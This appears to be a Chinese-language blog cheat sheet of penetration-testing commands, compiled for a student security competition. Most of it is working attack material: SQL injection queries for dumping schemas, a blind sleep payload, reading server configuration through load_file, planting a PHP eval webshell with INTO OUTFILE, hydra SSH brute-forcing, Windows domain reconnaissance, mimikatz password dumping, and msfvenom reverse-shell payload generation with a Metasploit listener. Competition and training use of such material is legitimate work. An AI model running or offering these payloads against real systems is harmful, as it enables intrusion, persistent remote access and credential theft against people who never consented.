By

Contents
  1. 1. web拿shell
    1. 1.1. 简单的mysql注入
    2. 1.2. 延时盲注
    3. 1.3. SQL注入读apache配置文件找网站绝对路径
    4. 1.4. SQL注入写shell
    5. 1.5. phpMyAdmin写shell
  2. 2. cms拿Webshell
    1. 2.1. dedecms
  3. 3. 系统层面
  4. 4. 内网渗透
    1. 4.1. 信息获取
    2. 4.2. ssh连接
    3. 4.3. 读取密码
  5. 5. kali内网渗透

最近学校组织参加西普杯 铁人三项比赛,很久没搞渗透,重新把这一块给拾起来

西普杯铁人三项包括

  • 个人环境竞赛(pwn)
  • 企业环境竞赛(综合渗透)
  • 数据分析对抗(wireshark流量分析)

对其他两项涉足比较少,所以打算在综合渗透上深挖

web拿shell

简单的mysql注入

查字段数

order by 或者 union select null,null

查数据库

union select group_concat(schema_name) from information_schema.schemata

查表

union select group_concat(table_name) from information_schema.tables where table_schema=数据库的十六进制hex值

查字段

union select group_concat(column_name) from information_schema.columns where table_schema=数据库的十六进制值 and table_name=数据表名的十六进制

延时盲注

延时5秒钟后查看结果

'%2B(select(0)from(select(sleep(5)))v)%2B'

SQL注入读apache配置文件找网站绝对路径

linux下

http://172.16.1.162/sql/index.php?id=12 UNION SELECT load_file("/etc/httpd/conf/httpd.conf"),2,3,4,5,6,7,8,9,10

SQL注入写shell

http://172.16.1.162/sql/index.php?id=12 UNION SELECT   0x223C3F706870206576616C28245F504F53545B636D645D293B203F3E22,2,3,4,5,6,7,8,9,10 
into outfile "/var/www/html/uploads/shell.php"

shell一句话木马内容在sql注入中必须进行十六进制转义

phpMyAdmin写shell

select "<?php eval($_POST[cmd]); ?>" into outfile "/var/html/www/shell.php"

cms拿Webshell

dedecms

后台->附件管理->文件管理器->文件上传

系统层面

ssh爆破:

hydra -L root.txt -P pass.txt -t 线程 x.x.x.x ssh

内网渗透

信息获取

ifconfig /all
netstat -an
net start
net user
net user /domain  //查看域用户
net view /domain  //查看存在多少个域
net group "domain admins" /domain   //查看域管理员
net view 列出内网计算机
nbstat  //通过计算机名获取响应ip 或者 ping 计算机名
arp -a 获取与本机通讯的列表
net localgroup administrators
dsquery server //查看域控服务器
dsquery subnet  //查看域IP范围

ssh连接

ssh username@host

上传文件

上传本地文件到服务器

scp /path/filename username@host:/path/

从服务器上下载文件

scp username@host:/path/filename /var/www/local_dir(本地目录)

从服务器上下载整个目录

scp -r username@host:/var/www/remote_dir/(远程目录) /var/www/local_dir(本地目录)

上传目录到服务器

scp -r local_dir username@host:remote_dir

读取密码

mimikatz

privilege::debug //提权
sekurlsa::logonpasswords //读取密码

kali内网渗透

###kali生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=88
-f xxx -o shell.xxx

参数详解:

  • p payload名称 使用 -l 参数参看可用的payload
  • LHOST 攻击机地址
  • LPORT 攻击机监听端口
  • f 生成的文件类型 使用 –help-formats 参数参看可以生成的文件类型
  • o 生成的文件名

Metasploit监听

msfconsole
use exploit/multi/handler   //使用模块
set payload windows/meterpreter/reverse_tcp  //设置攻击荷载
set lhost x.x.x.x      //攻击机本地ip地址
set lport 88           //攻击机本地端口
run  //进行监听
Contents
  1. 1. web拿shell
    1. 1.1. 简单的mysql注入
    2. 1.2. 延时盲注
    3. 1.3. SQL注入读apache配置文件找网站绝对路径
    4. 1.4. SQL注入写shell
    5. 1.5. phpMyAdmin写shell
  2. 2. cms拿Webshell
    1. 2.1. dedecms
  3. 3. 系统层面
  4. 4. 内网渗透
    1. 4.1. 信息获取
    2. 4.2. ssh连接
    3. 4.3. 读取密码
  5. 5. kali内网渗透